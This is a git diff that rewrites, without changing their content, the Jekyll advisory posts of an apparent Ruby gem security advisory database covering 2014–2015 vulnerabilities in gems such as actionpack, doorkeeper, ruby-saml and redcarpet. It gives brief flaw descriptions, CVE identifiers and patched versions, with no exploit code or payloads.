-  cve: 2014-7829
-  ghsa: h56m-vwxc-3qpw
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/rMTQy4oRCGk
-  title: Arbitrary file existence disclosure in Action Pack
-  date: 2014-11-17
-  description: |
-    Specially crafted requests can be used to determine whether a file exists on
-    the filesystem that is outside the Rails application's root directory.  The
-    files will not be served, but attackers can determine whether or not the file
-    exists.  This vulnerability is very similar to CVE-2014-7818, but the
-    specially crafted string is slightly different.
-  cvss_v2: 5.0
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - "~> 3.2.21"
-  - "~> 4.0.11.1"
-  - "~> 4.0.12"
-  - "~> 4.1.7.1"
-  - ">= 4.1.8"
----
+---
+layout: advisory
+title: 'CVE-2014-7829 (actionpack): Arbitrary file existence disclosure in Action
+  Pack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2014-7829
+  ghsa: h56m-vwxc-3qpw
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/rMTQy4oRCGk
+  title: Arbitrary file existence disclosure in Action Pack
+  date: 2014-11-17
+  description: |
+    Specially crafted requests can be used to determine whether a file exists on
+    the filesystem that is outside the Rails application's root directory.  The
+    files will not be served, but attackers can determine whether or not the file
+    exists.  This vulnerability is very similar to CVE-2014-7818, but the
+    specially crafted string is slightly different.
+  cvss_v2: 5.0
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - "~> 3.2.21"
+  - "~> 4.0.11.1"
+  - "~> 4.0.12"
+  - "~> 4.1.7.1"
+  - ">= 4.1.8"
+---
diff --git a/advisories/_posts/2014-12-04-CVE-2014-9489.md b/advisories/_posts/2014-12-04-CVE-2014-9489.md
index d53cde8b..60e27e84 100644
--- a/advisories/_posts/2014-12-04-CVE-2014-9489.md
+++ b/advisories/_posts/2014-12-04-CVE-2014-9489.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2014-9489 (gollum-grit_adapter): gollum-grit_adapter Search Functionality
-  Allows Arbitrary Command Execution'
-comments: false
-categories:
-- gollum-grit_adapter
-advisory:
-  gem: gollum-grit_adapter
-  cve: 2014-9489
-  url: https://github.com/gollum/gollum/issues/913
-  title: gollum-grit_adapter Search Functionality Allows Arbitrary Command Execution
-  date: 2014-12-04
-  description: |
-    The gollum-grit_adapter gem contains a flaw that can allow arbitrary
-    command execution.
-
-    Grit implements its search functionality by shelling out to `git grep`. In
-    turn, `git grep` takes a `-O` or `--open-files-in-pages` option that will
-    pipe the results of `grep` to an arbitrary process. By failing to properly
-    sanitize user input search parameters, an attacker can thus perform command
-    execution.
-
-    Note that the grep result must find the string 'master' (or
-    whatever is the default branch that gollum uses) in any of the wiki's
-    documents for this to succeed.
-  patched_versions:
-  - ">= 0.1.1"
----
+---
+layout: advisory
+title: 'CVE-2014-9489 (gollum-grit_adapter): gollum-grit_adapter Search Functionality
+  Allows Arbitrary Command Execution'
+comments: false
+categories:
+- gollum-grit_adapter
+advisory:
+  gem: gollum-grit_adapter
+  cve: 2014-9489
+  url: https://github.com/gollum/gollum/issues/913
+  title: gollum-grit_adapter Search Functionality Allows Arbitrary Command Execution
+  date: 2014-12-04
+  description: |
+    The gollum-grit_adapter gem contains a flaw that can allow arbitrary
+    command execution.
+
+    Grit implements its search functionality by shelling out to `git grep`. In
+    turn, `git grep` takes a `-O` or `--open-files-in-pages` option that will
+    pipe the results of `grep` to an arbitrary process. By failing to properly
+    sanitize user input search parameters, an attacker can thus perform command
+    execution.
+
+    Note that the grep result must find the string 'master' (or
+    whatever is the default branch that gollum uses) in any of the wiki's
+    documents for this to succeed.
+  patched_versions:
+  - ">= 0.1.1"
+---
diff --git a/advisories/_posts/2014-12-08-CVE-2014-9490.md b/advisories/_posts/2014-12-08-CVE-2014-9490.md
index 36484168..dc25857a 100644
--- a/advisories/_posts/2014-12-08-CVE-2014-9490.md
+++ b/advisories/_posts/2014-12-08-CVE-2014-9490.md
@@ -1,25 +1,25 @@
----
-layout: advisory
-title: 'CVE-2014-9490 (sentry-raven): sentry-raven Gem for Ruby contains a flaw that
-  can result in a denial of service'
-comments: false
-categories:
-- sentry-raven
-advisory:
-  gem: sentry-raven
-  cve: 2014-9490
-  osvdb: 115654
-  ghsa: c9c5-9fpr-m882
-  url: https://nvd.nist.gov/vuln/detail/CVE-2014-9490
-  title: sentry-raven Gem for Ruby contains a flaw that can result in a denial of
-    service
-  date: 2014-12-08
-  description: |
-    Sentry raven-ruby contains a flaw in the lib/raven/okjson.rb script that
-    is triggered when large numeric values are stored as an exponent or in scientific
-    notation. With a specially crafted request, an attacker can cause the software to
-    consume excessive resources resulting in a denial of service.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 0.12.2"
----
+---
+layout: advisory
+title: 'CVE-2014-9490 (sentry-raven): sentry-raven Gem for Ruby contains a flaw that
+  can result in a denial of service'
+comments: false
+categories:
+- sentry-raven
+advisory:
+  gem: sentry-raven
+  cve: 2014-9490
+  osvdb: 115654
+  ghsa: c9c5-9fpr-m882
+  url: https://nvd.nist.gov/vuln/detail/CVE-2014-9490
+  title: sentry-raven Gem for Ruby contains a flaw that can result in a denial of
+    service
+  date: 2014-12-08
+  description: |
+    Sentry raven-ruby contains a flaw in the lib/raven/okjson.rb script that
+    is triggered when large numeric values are stored as an exponent or in scientific
+    notation. With a specially crafted request, an attacker can cause the software to
+    consume excessive resources resulting in a denial of service.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 0.12.2"
+---
diff --git a/advisories/_posts/2014-12-18-CVE-2014-8144.md b/advisories/_posts/2014-12-18-CVE-2014-8144.md
index dc4046be..9088b927 100644
--- a/advisories/_posts/2014-12-18-CVE-2014-8144.md
+++ b/advisories/_posts/2014-12-18-CVE-2014-8144.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2014-8144 (doorkeeper): Cross-site request forgery (CSRF) vulnerability
-  in doorkeeper 1.4.0 and earlier.'
-comments: false
-categories:
-- doorkeeper
-advisory:
-  gem: doorkeeper
-  cve: 2014-8144
-  osvdb: 116010
-  ghsa: 685w-vc84-wxcx
-  url: https://groups.google.com/forum/#!topic/ruby-security-ann/5_VqJtNc8jw
-  title: Cross-site request forgery (CSRF) vulnerability in doorkeeper 1.4.0 and earlier.
-  date: 2014-12-18
-  description: |
-    Cross-site request forgery (CSRF) vulnerability in doorkeeper 1.4.0
-    and earlier allows remote attackers to hijack the user's OAuth
-    autorization code. This vulnerability has been assigned the CVE
-    identifier CVE-2014-8144.
-
-    Doorkeeper's endpoints didn't have CSRF protection. Any HTML document
-    on the Internet can then read a user's authorization code with
-    arbitrary scope from any Doorkeeper-compatible Rails app you are
-    logged in.
-  cvss_v2: 6.8
-  patched_versions:
-  - "~> 1.4.1"
-  - ">= 2.0.0"
----
+---
+layout: advisory
+title: 'CVE-2014-8144 (doorkeeper): Cross-site request forgery (CSRF) vulnerability
+  in doorkeeper 1.4.0 and earlier.'
+comments: false
+categories:
+- doorkeeper
+advisory:
+  gem: doorkeeper
+  cve: 2014-8144
+  osvdb: 116010
+  ghsa: 685w-vc84-wxcx
+  url: https://groups.google.com/forum/#!topic/ruby-security-ann/5_VqJtNc8jw
+  title: Cross-site request forgery (CSRF) vulnerability in doorkeeper 1.4.0 and earlier.
+  date: 2014-12-18
+  description: |
+    Cross-site request forgery (CSRF) vulnerability in doorkeeper 1.4.0
+    and earlier allows remote attackers to hijack the user's OAuth
+    autorization code. This vulnerability has been assigned the CVE
+    identifier CVE-2014-8144.
+
+    Doorkeeper's endpoints didn't have CSRF protection. Any HTML document
+    on the Internet can then read a user's authorization code with
+    arbitrary scope from any Doorkeeper-compatible Rails app you are
+    logged in.
+  cvss_v2: 6.8
+  patched_versions:
+  - "~> 1.4.1"
+  - ">= 2.0.0"
+---
diff --git a/advisories/_posts/2015-02-03-OSVDB-117903.md b/advisories/_posts/2015-02-03-OSVDB-117903.md
index b558a121..837d9004 100644
--- a/advisories/_posts/2015-02-03-OSVDB-117903.md
+++ b/advisories/_posts/2015-02-03-OSVDB-117903.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'OSVDB-117903 (ruby-saml): Ruby-Saml Gem is vulnerable to arbitrary code execution'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  osvdb: 117903
-  url: https://advisories.dxw.com/advisories/publicly-exploitable-command-injection-in-ruby-saml-0-7-2-library-can-root-the-host
-  title: Ruby-Saml Gem is vulnerable to arbitrary code execution
-  date: 2015-02-03
-  description: |
-    ruby-saml contains a flaw that is triggered as the URI value of a
-    SAML response is not properly sanitized through a prepared statement.
-    This may allow a remote attacker to execute arbitrary shell commands
-    on the host machine.
-  patched_versions:
-  - ">= 0.8.2"
-  related:
-    url:
-    - https://advisories.dxw.com/advisories/publicly-exploitable-command-injection-in-ruby-saml-0-7-2-library-can-root-the-host
-    - https://seclists.org/oss-sec/2015/q3/282
-    - https://github.com/SAML-Toolkits/ruby-saml/pull/225#issuecomment-120084288
-    - https://github.com/SAML-Toolkits/ruby-saml/commit/1b4e3dd6d2d44efa629144b2180842456bfb2a0f#diff-661b9d9743a3ff77661f224c6191165cL242
-    - https://www.mend.io/vulnerability-database/WS-2015-0040
-    - http://www.osvdb.org/show/osvdb/117903
----
+---
+layout: advisory
+title: 'OSVDB-117903 (ruby-saml): Ruby-Saml Gem is vulnerable to arbitrary code execution'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  osvdb: 117903
+  url: https://advisories.dxw.com/advisories/publicly-exploitable-command-injection-in-ruby-saml-0-7-2-library-can-root-the-host
+  title: Ruby-Saml Gem is vulnerable to arbitrary code execution
+  date: 2015-02-03
+  description: |
+    ruby-saml contains a flaw that is triggered as the URI value of a
+    SAML response is not properly sanitized through a prepared statement.
+    This may allow a remote attacker to execute arbitrary shell commands
+    on the host machine.
+  patched_versions:
+  - ">= 0.8.2"
+  related:
+    url:
+    - https://advisories.dxw.com/advisories/publicly-exploitable-command-injection-in-ruby-saml-0-7-2-library-can-root-the-host
+    - https://seclists.org/oss-sec/2015/q3/282
+    - https://github.com/SAML-Toolkits/ruby-saml/pull/225#issuecomment-120084288
+    - https://github.com/SAML-Toolkits/ruby-saml/commit/1b4e3dd6d2d44efa629144b2180842456bfb2a0f#diff-661b9d9743a3ff77661f224c6191165cL242
+    - https://www.mend.io/vulnerability-database/WS-2015-0040
+    - http://www.osvdb.org/show/osvdb/117903
+---
diff --git a/advisories/_posts/2015-02-10-CVE-2015-1426.md b/advisories/_posts/2015-02-10-CVE-2015-1426.md
index 37c53c74..c08d9b8e 100644
--- a/advisories/_posts/2015-02-10-CVE-2015-1426.md
+++ b/advisories/_posts/2015-02-10-CVE-2015-1426.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2015-1426 (facter): Puppet Labs Facter allows local users to obtains sensitive
-  Amazon EC2 IAM instance metadata by reading a fact for an Amazon EC2 node.'
-comments: false
-categories:
-- facter
-advisory:
-  gem: facter
-  cve: 2015-1426
-  ghsa: j436-h7hm-rx46
-  url: https://www.puppet.com/security/cve/cve-2015-1426-potential-sensitive-information-leakage-facters-amazon-ec2-metadata
-  title: Puppet Labs Facter allows local users to obtains sensitive Amazon EC2 IAM
-    instance metadata by reading a fact for an Amazon EC2 node.
-  date: 2015-02-10
-  description: |
-    Puppet Labs Facter 1.6.0 through 2.4.0 allows local users to
-    obtains sensitive Amazon EC2 IAM instance metadata by reading
-    a fact for an Amazon EC2 node.
-  cvss_v2: 2.1
-  cvss_v3: 1.3
-  unaffected_versions:
-  - "< 1.6.0"
-  patched_versions:
-  - ">= 2.4.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2015-1426
-    - https://www.puppet.com/security/cve/cve-2015-1426-potential-sensitive-information-leakage-facters-amazon-ec2-metadata
-    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/disclosure-amazon-ec2-iam-instance/ruby/sid-1508/summary
-    - https://srcclr.com/security/disclosure-amazon-ec2-iam-instance/ruby/s-1508
-    - https://github.com/rubysec/ruby-advisory-db/issues/238
-    - https://github.com/advisories/GHSA-j436-h7hm-rx46
----
+---
+layout: advisory
+title: 'CVE-2015-1426 (facter): Puppet Labs Facter allows local users to obtains sensitive
+  Amazon EC2 IAM instance metadata by reading a fact for an Amazon EC2 node.'
+comments: false
+categories:
+- facter
+advisory:
+  gem: facter
+  cve: 2015-1426
+  ghsa: j436-h7hm-rx46
+  url: https://www.puppet.com/security/cve/cve-2015-1426-potential-sensitive-information-leakage-facters-amazon-ec2-metadata
+  title: Puppet Labs Facter allows local users to obtains sensitive Amazon EC2 IAM
+    instance metadata by reading a fact for an Amazon EC2 node.
+  date: 2015-02-10
+  description: |
+    Puppet Labs Facter 1.6.0 through 2.4.0 allows local users to
+    obtains sensitive Amazon EC2 IAM instance metadata by reading
+    a fact for an Amazon EC2 node.
+  cvss_v2: 2.1
+  cvss_v3: 1.3
+  unaffected_versions:
+  - "< 1.6.0"
+  patched_versions:
+  - ">= 2.4.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-1426
+    - https://www.puppet.com/security/cve/cve-2015-1426-potential-sensitive-information-leakage-facters-amazon-ec2-metadata
+    - https://sca.analysiscenter.veracode.com/vulnerability-database/security/disclosure-amazon-ec2-iam-instance/ruby/sid-1508/summary
+    - https://srcclr.com/security/disclosure-amazon-ec2-iam-instance/ruby/s-1508
+    - https://github.com/rubysec/ruby-advisory-db/issues/238
+    - https://github.com/advisories/GHSA-j436-h7hm-rx46
+---
diff --git a/advisories/_posts/2015-02-10-OSVDB-118830.md b/advisories/_posts/2015-02-10-OSVDB-118830.md
index 43d1945f..37420667 100644
--- a/advisories/_posts/2015-02-10-OSVDB-118830.md
+++ b/advisories/_posts/2015-02-10-OSVDB-118830.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'OSVDB-118830 (doorkeeper): Doorkeeper Gem for Ruby stores sensitive information
-  in production logs'
-comments: false
-categories:
-- doorkeeper
-advisory:
-  gem: doorkeeper
-  osvdb: 118830
-  url: https://www.versioneye.com/Ruby/doorkeeper/2.1.1
-  title: Doorkeeper Gem for Ruby stores sensitive information in production logs
-  date: 2015-02-10
-  description: |
-    Doorkeeper Gem for Ruby contains a flaw in lib/doorkeeper/engine.rb.
-    The issue is due to the program storing sensitive information in
-    production logs. This may allow a local attacker to gain access to
-    sensitive information.
-  patched_versions:
-  - "~> 1.4.2"
-  - ">= 2.1.2"
-  related:
-    url:
-    - https://www.versioneye.com/Ruby/doorkeeper/2.1.1
-    - https://github.com/doorkeeper-gem/doorkeeper/commit/d6bca5f32b741b8cee83a4aeb818338b919181fe
-    - https://github.com/doorkeeper-gem/doorkeeper/blob/main/lib/doorkeeper/engine.rb
-    - https://github.com/doorkeeper-gem/doorkeeper/issues/576
-    - https://github.com/rubysec/ruby-advisory-db/pull/128
-    - https://my.diffend.io/gems/doorkeeper/versions/0.3.0
-    - https://security.snyk.io/vuln/SNYK-RUBY-DOORKEEPER-20206
-    - https://www.mend.io/vulnerability-database/WS-2015-0039
-    - http://www.osvdb.org/show/osvdb/118830
-  notes: 'Issue #576 backported to 1.4.x on March 2, 2015.'
----
+---
+layout: advisory
+title: 'OSVDB-118830 (doorkeeper): Doorkeeper Gem for Ruby stores sensitive information
+  in production logs'
+comments: false
+categories:
+- doorkeeper
+advisory:
+  gem: doorkeeper
+  osvdb: 118830
+  url: https://www.versioneye.com/Ruby/doorkeeper/2.1.1
+  title: Doorkeeper Gem for Ruby stores sensitive information in production logs
+  date: 2015-02-10
+  description: |
+    Doorkeeper Gem for Ruby contains a flaw in lib/doorkeeper/engine.rb.
+    The issue is due to the program storing sensitive information in
+    production logs. This may allow a local attacker to gain access to
+    sensitive information.
+  patched_versions:
+  - "~> 1.4.2"
+  - ">= 2.1.2"
+  related:
+    url:
+    - https://www.versioneye.com/Ruby/doorkeeper/2.1.1
+    - https://github.com/doorkeeper-gem/doorkeeper/commit/d6bca5f32b741b8cee83a4aeb818338b919181fe
+    - https://github.com/doorkeeper-gem/doorkeeper/blob/main/lib/doorkeeper/engine.rb
+    - https://github.com/doorkeeper-gem/doorkeeper/issues/576
+    - https://github.com/rubysec/ruby-advisory-db/pull/128
+    - https://my.diffend.io/gems/doorkeeper/versions/0.3.0
+    - https://security.snyk.io/vuln/SNYK-RUBY-DOORKEEPER-20206
+    - https://www.mend.io/vulnerability-database/WS-2015-0039
+    - http://www.osvdb.org/show/osvdb/118830
+  notes: 'Issue #576 backported to 1.4.x on March 2, 2015.'
+---
diff --git a/advisories/_posts/2015-02-16-CVE-2015-1585.md b/advisories/_posts/2015-02-16-CVE-2015-1585.md
index 563972f4..b94069fe 100644
--- a/advisories/_posts/2015-02-16-CVE-2015-1585.md
+++ b/advisories/_posts/2015-02-16-CVE-2015-1585.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2015-1585 (fat_free_crm): Fat Free CRM Gem being vulnerable to CSRF-type
-  attacks'
-comments: false
-categories:
-- fat_free_crm
-advisory:
-  gem: fat_free_crm
-  cve: 2015-1585
-  osvdb: 118465
-  ghsa: wx7c-8j35-mpg8
-  url: https://nvd.nist.gov/vuln/detail/CVE-2015-1585
-  title: Fat Free CRM Gem being vulnerable to CSRF-type attacks
-  date: 2015-02-16
-  description: |
-    Fat Free CRM contains a flaw as HTTP requests to /admin/users do not require
-    multiple steps, explicit confirmation, or a unique token when performing
-    certain sensitive actions. By tricking a user into following a specially
-    crafted link, a context-dependent attacker can perform a Cross-Site Request
-    Forgery (CSRF / XSRF) attack causing the victim to creating administrative
-    users.
-  cvss_v2: 6.8
-  patched_versions:
-  - ">= 0.13.6"
----
+---
+layout: advisory
+title: 'CVE-2015-1585 (fat_free_crm): Fat Free CRM Gem being vulnerable to CSRF-type
+  attacks'
+comments: false
+categories:
+- fat_free_crm
+advisory:
+  gem: fat_free_crm
+  cve: 2015-1585
+  osvdb: 118465
+  ghsa: wx7c-8j35-mpg8
+  url: https://nvd.nist.gov/vuln/detail/CVE-2015-1585
+  title: Fat Free CRM Gem being vulnerable to CSRF-type attacks
+  date: 2015-02-16
+  description: |
+    Fat Free CRM contains a flaw as HTTP requests to /admin/users do not require
+    multiple steps, explicit confirmation, or a unique token when performing
+    certain sensitive actions. By tricking a user into following a specially
+    crafted link, a context-dependent attacker can perform a Cross-Site Request
+    Forgery (CSRF / XSRF) attack causing the victim to creating administrative
+    users.
+  cvss_v2: 6.8
+  patched_versions:
+  - ">= 0.13.6"
+---
diff --git a/advisories/_posts/2015-02-17-CVE-2015-2179.md b/advisories/_posts/2015-02-17-CVE-2015-2179.md
index ae71115c..07ce0420 100644
--- a/advisories/_posts/2015-02-17-CVE-2015-2179.md
+++ b/advisories/_posts/2015-02-17-CVE-2015-2179.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2015-2179 (xaviershay-dm-rails): xaviershay-dm-rails Gem for Ruby exposes
-  sensitive information via the process table'
-comments: false
-categories:
-- xaviershay-dm-rails
-advisory:
-  gem: xaviershay-dm-rails
-  cve: 2015-2179
-  osvdb: 118579
-  ghsa: 88p8-4vv5-82j7
-  url: https://nvd.nist.gov/vuln/detail/CVE-2015-2179
-  title: xaviershay-dm-rails Gem for Ruby exposes sensitive information via the process
-    table
-  date: 2015-02-17
-  description: |
-    xaviershay-dm-rails Gem for Ruby contains a flaw in the execute() function
-    in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb. The issue is
-    due to the function exposing sensitive information via the process table.
-    This may allow a local attack to gain access to MySQL credential information.
-  cvss_v3: 5.5
----
+---
+layout: advisory
+title: 'CVE-2015-2179 (xaviershay-dm-rails): xaviershay-dm-rails Gem for Ruby exposes
+  sensitive information via the process table'
+comments: false
+categories:
+- xaviershay-dm-rails
+advisory:
+  gem: xaviershay-dm-rails
+  cve: 2015-2179
+  osvdb: 118579
+  ghsa: 88p8-4vv5-82j7
+  url: https://nvd.nist.gov/vuln/detail/CVE-2015-2179
+  title: xaviershay-dm-rails Gem for Ruby exposes sensitive information via the process
+    table
+  date: 2015-02-17
+  description: |
+    xaviershay-dm-rails Gem for Ruby contains a flaw in the execute() function
+    in /datamapper/dm-rails/blob/master/lib/dm-rails/storage.rb. The issue is
+    due to the function exposing sensitive information via the process table.
+    This may allow a local attack to gain access to MySQL credential information.
+  cvss_v3: 5.5
+---
diff --git a/advisories/_posts/2015-03-05-OSVDB-119205.md b/advisories/_posts/2015-03-05-OSVDB-119205.md
index de99b1e3..184183d8 100644
--- a/advisories/_posts/2015-03-05-OSVDB-119205.md
+++ b/advisories/_posts/2015-03-05-OSVDB-119205.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'OSVDB-119205 (spree): Spree API Information Disclosure CSRF'
-comments: false
-categories:
-- spree
-advisory:
-  gem: spree
-  osvdb: 119205
-  url: https://web.archive.org/web/20150920092934/https://spreecommerce.com/blog/security-updates-2015-3-3
-  title: Spree API Information Disclosure CSRF
-  date: 2015-03-05
-  description: |
-    Spree contains a flaw in the API as HTTP requests do not require
-    multiple steps, explicit confirmation, or a unique token when
-    performing certain sensitive actions. By tricking a user into
-    following a specially crafted link, a context-dependent attacker
-    can perform a Cross-Site Request Forgery (CSRF / XSRF) attack
-    causing the victim to disclose potentially sensitive information
-    to attackers.
-  patched_versions:
-  - "~> 2.2.10"
-  - "~> 2.3.8"
-  - "~> 2.4.5"
-  - ">= 3.0.0.rc4"
-  related:
-    url:
-    - https://web.archive.org/web/20150920092934/https://spreecommerce.com/blog/security-updates-2015-3-3
-    - https://seclists.org/oss-sec/2015/q3/275
-    - https://github.com/spree/spree/commit/bfb5f907219d6f8f879ca940882befe89b58a1a4
-    - https://security.snyk.io/vuln/SNYK-RUBY-SPREE-20360
-    - https://github.com/rubysec/bundler-audit/issues/106
----
+---
+layout: advisory
+title: 'OSVDB-119205 (spree): Spree API Information Disclosure CSRF'
+comments: false
+categories:
+- spree
+advisory:
+  gem: spree
+  osvdb: 119205
+  url: https://web.archive.org/web/20150920092934/https://spreecommerce.com/blog/security-updates-2015-3-3
+  title: Spree API Information Disclosure CSRF
+  date: 2015-03-05
+  description: |
+    Spree contains a flaw in the API as HTTP requests do not require
+    multiple steps, explicit confirmation, or a unique token when
+    performing certain sensitive actions. By tricking a user into
+    following a specially crafted link, a context-dependent attacker
+    can perform a Cross-Site Request Forgery (CSRF / XSRF) attack
+    causing the victim to disclose potentially sensitive information
+    to attackers.
+  patched_versions:
+  - "~> 2.2.10"
+  - "~> 2.3.8"
+  - "~> 2.4.5"
+  - ">= 3.0.0.rc4"
+  related:
+    url:
+    - https://web.archive.org/web/20150920092934/https://spreecommerce.com/blog/security-updates-2015-3-3
+    - https://seclists.org/oss-sec/2015/q3/275
+    - https://github.com/spree/spree/commit/bfb5f907219d6f8f879ca940882befe89b58a1a4
+    - https://security.snyk.io/vuln/SNYK-RUBY-SPREE-20360
+    - https://github.com/rubysec/bundler-audit/issues/106
+---
diff --git a/advisories/_posts/2015-03-24-CVE-2015-1820.md b/advisories/_posts/2015-03-24-CVE-2015-1820.md
index 65eed0d2..c22750bc 100644
--- a/advisories/_posts/2015-03-24-CVE-2015-1820.md
+++ b/advisories/_posts/2015-03-24-CVE-2015-1820.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2015-1820 (rest-client): CVE-2015-1820 rubygem-rest-client: session fixation
-  vulnerability Set-Cookie headers present in an HTTP 30x redirection responses'
-comments: false
-categories:
-- rest-client
-advisory:
-  gem: rest-client
-  cve: 2015-1820
-  osvdb: 119878
-  ghsa: 3fhf-6939-qg8p
-  url: https://github.com/rest-client/rest-client/issues/369
-  title: 'CVE-2015-1820 rubygem-rest-client: session fixation vulnerability Set-Cookie
-    headers present in an HTTP 30x redirection responses'
-  date: 2015-03-24
-  description: |
-    REST client for Ruby (aka rest-client) before 1.8.0 allows remote attackers
-    to conduct session fixation attacks or obtain sensitive cookie information by leveraging
-    passage of cookies set in a response to a redirect.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "<= 1.6.0"
-  patched_versions:
-  - ">= 1.8.0"
----
+---
+layout: advisory
+title: 'CVE-2015-1820 (rest-client): CVE-2015-1820 rubygem-rest-client: session fixation
+  vulnerability Set-Cookie headers present in an HTTP 30x redirection responses'
+comments: false
+categories:
+- rest-client
+advisory:
+  gem: rest-client
+  cve: 2015-1820
+  osvdb: 119878
+  ghsa: 3fhf-6939-qg8p
+  url: https://github.com/rest-client/rest-client/issues/369
+  title: 'CVE-2015-1820 rubygem-rest-client: session fixation vulnerability Set-Cookie
+    headers present in an HTTP 30x redirection responses'
+  date: 2015-03-24
+  description: |
+    REST client for Ruby (aka rest-client) before 1.8.0 allows remote attackers
+    to conduct session fixation attacks or obtain sensitive cookie information by leveraging
+    passage of cookies set in a response to a redirect.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "<= 1.6.0"
+  patched_versions:
+  - ">= 1.8.0"
+---
diff --git a/advisories/_posts/2015-03-24-CVE-2015-1828.md b/advisories/_posts/2015-03-24-CVE-2015-1828.md
index 434e1e25..950e7e00 100644
--- a/advisories/_posts/2015-03-24-CVE-2015-1828.md
+++ b/advisories/_posts/2015-03-24-CVE-2015-1828.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2015-1828 (http): HTTPS MitM vulnerability in http.rb'
-comments: false
-categories:
-- http
-advisory:
-  gem: http
-  cve: 2015-1828
-  osvdb: 119927
-  ghsa: 6wpv-cj6x-v3jw
-  url: https://groups.google.com/forum/#!topic/httprb/jkb4oxwZjkU
-  title: HTTPS MitM vulnerability in http.rb
-  date: 2015-03-24
-  description: |
-    http.rb failed to call the OpenSSL::SSL::SSLSocket#post_connection_check method to perform hostname verification.
-    Because of this, an attacker with a valid certificate but with a mismatched subject can perform a MitM attack.
-  cvss_v2: 5.0
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 0.7.3"
-  - "~> 0.6.4"
----
+---
+layout: advisory
+title: 'CVE-2015-1828 (http): HTTPS MitM vulnerability in http.rb'
+comments: false
+categories:
+- http
+advisory:
+  gem: http
+  cve: 2015-1828
+  osvdb: 119927
+  ghsa: 6wpv-cj6x-v3jw
+  url: https://groups.google.com/forum/#!topic/httprb/jkb4oxwZjkU
+  title: HTTPS MitM vulnerability in http.rb
+  date: 2015-03-24
+  description: |
+    http.rb failed to call the OpenSSL::SSL::SSLSocket#post_connection_check method to perform hostname verification.
+    Because of this, an attacker with a valid certificate but with a mismatched subject can perform a MitM attack.
+  cvss_v2: 5.0
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 0.7.3"
+  - "~> 0.6.4"
+---
diff --git a/advisories/_posts/2015-04-07-OSVDB-120415.md b/advisories/_posts/2015-04-07-OSVDB-120415.md
index d66d2522..1d3c3625 100644
--- a/advisories/_posts/2015-04-07-OSVDB-120415.md
+++ b/advisories/_posts/2015-04-07-OSVDB-120415.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'OSVDB-120415 (redcarpet): redcarpet Gem for Ruby markdown.c parse_inline()
-  Function XSS'
-comments: false
-categories:
-- redcarpet
-advisory:
-  gem: redcarpet
-  osvdb: 120415
-  url: http://danlec.com/blog/bug-in-sundown-and-redcarpet
-  title: redcarpet Gem for Ruby markdown.c parse_inline() Function XSS
-  date: 2015-04-07
-  description: |
-    redcarpet Gem for Ruby contains a flaw that allows a cross-site scripting
-    (XSS) attack. This flaw exists because the parse_inline() function in
-    markdown.c does not validate input before returning it to users. This may
-    allow a remote attacker to create a specially crafted request that would
-    execute arbitrary script code in a user's browser session within the trust
-    relationship between their browser and the server.
-  patched_versions:
-  - ">= 3.2.3"
-  related:
-    url:
-    - https://github.com/vmg/redcarpet/releases/tag/v3.2.3
-    - http://danlec.com/blog/bug-in-sundown-and-redcarpet
-    - https://hackerone.com/reports/46916
-    - https://github.com/vmg/redcarpet/blob/master/ext/redcarpet/markdown.c
-    - https://github.com/Homebrew/brew.sh/issues/75
-    - https://git.revreso.de/gigadoc2/diaspora/-/tags/v0.4.1.3
-    - https://www.rapid7.com/db/vulnerabilities/freebsd-vid-c368155a-fa83-11e4-bc58-001e67150279
-    - https://www.mend.io/vulnerability-database/WS-2015-0038
----
+---
+layout: advisory
+title: 'OSVDB-120415 (redcarpet): redcarpet Gem for Ruby markdown.c parse_inline()
+  Function XSS'
+comments: false
+categories:
+- redcarpet
+advisory:
+  gem: redcarpet
+  osvdb: 120415
+  url: http://danlec.com/blog/bug-in-sundown-and-redcarpet
+  title: redcarpet Gem for Ruby markdown.c parse_inline() Function XSS
+  date: 2015-04-07
+  description: |
+    redcarpet Gem for Ruby contains a flaw that allows a cross-site scripting
+    (XSS) attack. This flaw exists because the parse_inline() function in
+    markdown.c does not validate input before returning it to users. This may
+    allow a remote attacker to create a specially crafted request that would
+    execute arbitrary script code in a user's browser session within the trust
+    relationship between their browser and the server.
+  patched_versions:
+  - ">= 3.2.3"
+  related:
+    url:
+    - https://github.com/vmg/redcarpet/releases/tag/v3.2.3
+    - http://danlec.com/blog/bug-in-sundown-and-redcarpet
+    - https://hackerone.com/reports/46916
+    - https://github.com/vmg/redcarpet/blob/master/ext/redcarpet/markdown.c
+    - https://github.com/Homebrew/brew.sh/issues/75
+    - https://git.revreso.de/gigadoc2/diaspora/-/tags/v0.4.1.3
+    - https://www.rapid7.com/db/vulnerabilities/freebsd-vid-c368155a-fa83-11e4-bc58-001e67150279
+    - https://www.mend.io/vulnerability-database/WS-2015-0038
+---
